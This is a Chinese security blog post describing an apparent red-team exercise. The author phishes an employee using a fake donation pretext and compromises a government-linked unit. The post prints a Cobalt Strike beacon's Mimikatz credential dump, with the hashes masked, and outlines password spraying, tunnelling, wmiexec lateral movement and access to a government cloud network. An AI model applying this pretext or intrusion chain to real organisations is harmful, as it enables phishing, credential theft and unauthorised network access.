记一次钓鱼实战打穿目标单位

admin 2023年5月30日18:31:33评论50 views字数 2648阅读8分49秒阅读模式

由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!

记一次钓鱼实战打穿目标单位


免责声明


由于传播、利用本公众号所发布的而造成的任何直接或者间接的后果及损失,均由使用者本人承担。LK安全公众号及原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!



欢迎各位师傅们关注!!!

前段时间参加某攻防演练,web端实在难啃,索性直接钓鱼

网上发现联系方式:http://www.xxx.org/article.html?id=10759

记一次钓鱼实战打穿目标单位

通过电话联系该单位员工,并以捐款为由添加个人微信账号

发送钓鱼文件

记一次钓鱼实战打穿目标单位

记一次钓鱼实战打穿目标单位

记一次钓鱼实战打穿目标单位

记一次钓鱼实战打穿目标单位

记一次钓鱼实战打穿目标单位

再回头去看 我们的鱼儿已经上钩

记一次钓鱼实战打穿目标单位

先抓密码
beacon> logonpasswords
[*] Tasked beacon to run Mimikatz inject pid:8980
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command into 8980 (x64)
[+] host called home, sent: 297602 bytes
[+] received output:
Authentication Id : 0 ; 480966 (00000000:000756c6)
Session : Interactive from 1
User Name : Administrator
Domain : USER-20160407FL
Logon Server : USER-20160407FL
Logon Time : 2023/5/15 11:08:54
SID : S-1-5-21-174909251-2012762638-3167670601-500
msv :
[00010000] CredentialKeys
* NTLM : 马赛克
* SHA1 : 马赛克
[00000003] Primary
* Username : Administrator
* Domain : USER-20160407FL
* NTLM : 马赛克
* SHA1 : 马赛克
tspkg :
wdigest :
* Username : Administrator

* Domain : USER-20160407FL
* Password : 马赛克
kerberos :
* Username : Administrator
* Domain : USER-20160407FL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/5/15 11:01:07
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : USER-20160407FL$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/5/15 11:01:07
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : USER-20160407FL$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : user-20160407fl$

* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 55917 (00000000:0000da6d)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/5/15 11:01:05
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : USER-20160407FL$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2023/5/15 11:01:05
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : USER-20160407FL$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : user-20160407fl$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman

通过密码喷洒获取6台主机权限

记一次钓鱼实战打穿目标单位

搭建内网隧道进入内网横向

wmiexec连接证明,成功执行命令

记一次钓鱼实战打穿目标单位

打印机权限

记一次钓鱼实战打穿目标单位

登录主机桌面

记一次钓鱼实战打穿目标单位

获得某市工作群权限 和全省工作群权限

记一次钓鱼实战打穿目标单位

后又突破强隔离内网 进入某市政务云专网

记一次钓鱼实战打穿目标单位

获得ssh弱口令若干

记一次钓鱼实战打穿目标单位

记一次钓鱼实战打穿目标单位

记一次钓鱼实战打穿目标单位

记一次钓鱼实战打穿目标单位

只是展示了部分成果

最终也是成功的将防守单位打穿出局(钓鱼yyds)

欢迎关注!!!

为了方便师傅们交流学习,我特意创建了一个群聊。内部会分享一些脱敏的漏洞报告,渗透测试实战案例,更有若干大牛巨佬分享经验。后续还会提供一些福利包括送书,小礼物等等,欢迎各位师傅进群交流。

记一次钓鱼实战打穿目标单位


关于知识星球



在一些师傅的建议和帮助下也是开通了知识星球,在开通很短的时间里加入人数已经达到400+,星球内原创文章数量达到100+。目前星球主打SRC挖掘和代码审计学习。现在也加入免杀,各类文档资料,各类IT网课等等。星球目前内容百分之九十以上为师傅们原创文章或思路,以及各大SRC平台的脱敏漏洞报告,真实渗透测试案例。星球目前的嘉宾有资深红队成员,某甲方安全团队成员,SRC高级白帽子等等。欢迎各位师傅们加入一起学习!
经过与内部群师傅们商量,知识星球已经由168一年改为168永久,到期为所有师傅进行续费。一次加入,终身免费!!!!
如果师傅还在上学但还是想入圈子学习,请添加我联系方式,私聊我以学生价入圈!!!!


记一次钓鱼实战打穿目标单位


原文始发于微信公众号(LK安全):记一次钓鱼实战打穿目标单位

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月30日18:31:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次钓鱼实战打穿目标单位http://cn-sec.com/archives/1773871.html

发表评论

匿名网友 填写信息